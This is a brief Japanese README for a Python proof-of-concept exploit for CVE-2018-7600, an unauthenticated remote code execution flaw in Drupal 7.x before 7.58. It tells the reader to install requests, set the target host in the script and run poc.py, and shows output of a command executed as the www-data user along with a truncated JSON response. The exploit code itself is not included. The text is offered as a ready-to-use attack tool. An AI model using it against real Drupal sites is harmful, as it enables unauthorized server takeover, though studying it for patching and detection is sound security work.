
# CVE-2018-7600 用 Python エクスプロイト Drupal 7.58 未満の 7.x バージョンで、認証なしのリモートコード実行を可能にするエクスプロイトです。
CVE-2018-7600 - Drupal 7.x RCE
Drupal < 7.58 における認証不要のRCE
必要条件
使用法
あとは requests をインストールして(pip install requests)、ファイルを編集してホストを変更し、エクスプロイトを実行するだけです:
python .\poc.py
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[{"command":"settings",......